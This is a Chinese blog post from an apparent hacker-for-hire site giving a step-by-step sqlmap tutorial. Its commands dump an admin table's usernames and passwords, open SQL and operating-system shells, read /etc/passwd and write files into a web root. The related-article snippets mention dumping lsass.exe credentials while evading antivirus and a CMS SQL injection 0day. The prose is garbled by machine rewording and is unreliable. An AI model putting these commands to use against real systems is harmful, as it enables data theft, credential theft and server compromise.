找黑客平台

最常见的Sqlmap用法

hacker4年前黑客文章664

Sqlmap是一个技术专业的SQL引入专用工具,使用 *** 也许多,实际可以用"sqlmap -hh"查询详细的指令帮助文件,我这仅仅给大伙儿共享一些最常见的Sqlmap用法:

 

一、Sqlmap引入篇

 

1、查验引入点

[email protected]:/# sqlmap -u http://192.168.1.104/sql.php?id=11

 

2、爆全部数据库查询信息内容

[email protected]:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --dbs

 

爆当今数据库查询信息内容

[email protected]:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --current-db

 

3、列举特定数据库查询全部的表名

[email protected]:/# sqlmap -u http://192.168.1.104/sql.php?id=11 -D fujieace --tables

'fujieace' 为特定数据库查询名字

 

4、列举特定表名的全部字段名

[email protected]:/# sqlmap -u http://192.168.1.104/sql.php?id=11 -D vhost48330 -T admin --columns

'admin' 为特定表名字

 

5、dump输出打印表名特定列姓名段的值数据信息

[email protected]:/# sqlmap -u http://192.168.1.104/sql.php?id=11 -D vhost48330 -T admin -C name,password --dump

'name,password' 为特定字段称

 

二、Sqlmap用户权限篇

 

1、列举数据库查询智能管理系统客户:

[email protected]:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --users

 

查询当今数据库连接客户:

[email protected]:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --current-user

 

2、分辨当今客户是不是DBA?

[email protected]:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --is-dba

 

3、查询用户权限:

[email protected]:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --privileges
[email protected]:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --privileges -U fujieace

 

三、Sqlmap文件实际操作与shell提权篇

 

1、sql shell

这儿根据sqlmap能够立即获得一个sql shell,立即实行sql语句开展互动。

[email protected]:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --sql-shell
sql-shell> select version();

 

留意:这儿因为进入了sql shell能够实行sql语句了,还可以用 load data infile、load_file、into outfile等涵数来开展文档载入或载入;

 

2、cmd shell

这 里根据sqlmap能够立即获得一个cmd shell,立即实行cmd指令开展互动。

[email protected]:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --os-shell
[email protected]:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --os-cmd=ipconfig

 

3、载入 *** 服务器上特定文档

[email protected]:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --file-read=/etc/passwd
[email protected]:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --file-read=d:/test.txt

 

4、载入本地文件到 *** 服务器上

[email protected]:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --file-write /test/test.txt --file-dest /var/www/html/1.txt
标签: 黑客技术
返回列表

上一篇:JohnRipper是“最后的”登陆密码黑客工具!专用工

下一篇:我们不一样的黑客渗透教程第六课,如何转发内网机器的端口?

相关文章

AcunetixWebVulnerabilitySca

AcunetixWebVulnerabilitySca

Acunetix Web Vulnerability Scanner(通称 AWVS )是一款著名的互联网漏洞检测专用工具,它根据爬虫技术检测营业网点安全性。   很多人都想有着一款专用工...

TamperData是否适用全部电脑操作系统?

TamperData是否适用全部电脑操作系统?

什么叫Tamper Data? Tamper Data是Mozilla Firefox拓展,能够在推送HTTP恳求以前改动和查询HTTP恳求。它将显示信息Web电脑浏览器意味着您推送的数据信息,比如...

DedeCMS会员中心短消息SQL注射0day漏洞

需要:magic_quotes_gpc = Off DedeCMS会员中心短消息SQL注射漏洞,成功利用此漏洞可获得管理员密码: http://www.chncto.com/de/membe...

中国十大黑客网站排行榜 中国黑客网站排名

NO.1:黑客基地   站长:孤独剑客,中国黑客界第二代黑客泰斗人物。 他的名字已经在黑客界家喻户晓。他正演绎属于他自己的黑客生涯,同时他用自身的技术实力征服着每个向往黑客的人。黑客基地自2003年...

Argus是啥?

Argus是啥?

Argus是啥? Argus可用以协助适用网络信息安全管理方法和互联网调查取证。根据恰当的对策,克罗地亚数据信息能够 被采掘,以明确您是不是古代历史遭受侵入或进攻,在公布进攻并明确了让步指标值(IO...

绕过杀毒软件抓取windows密码

 使用procdump,由于是微软的东西,带微软签名杀软不会报毒。 procdump -accepteula -ma lsass.exe lsass.dmp copy出 ls...

Copyright Your WebSite.Some Rights Reserved.

免责声明:本站所发布的任何网站,全部来源于互联网,版权争议与本站无关。仅供技术交流,如有侵权或不合适,请联系本人进行删除。不允许做任何非法用途!

Hacker by Hacker.